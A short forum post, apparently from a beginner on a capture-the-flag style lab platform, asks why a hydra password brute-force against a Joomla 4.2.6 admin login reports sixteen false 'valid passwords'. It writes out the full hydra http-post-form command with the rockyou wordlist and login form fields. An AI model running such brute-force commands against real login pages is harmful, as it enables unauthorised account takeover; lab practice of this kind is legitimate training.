Hey all, I just started hacking this week and pwned my first box the other day. Working on another box but having issues with hydra returning false positives. Here is my command for trying to brute force a Joomla website (v4.2.6)
hydra -l admin -P /usr/share/wordlists/rockyou.txt example.htb http-post-form "/administrator:username=admin&passwd=^PASS^&option=com_login&task=login&return=aW5kZXgucGhw&25635e86f755ae5e1f2edaf51dee5cfc=1:F=<form id='form-login'"
It just keeps returning “1 of 1 target successfully completed, 16 valid passwords found” when none of them are correct.
Any suggestions on what’s wrong with my script? Thanks in advance!!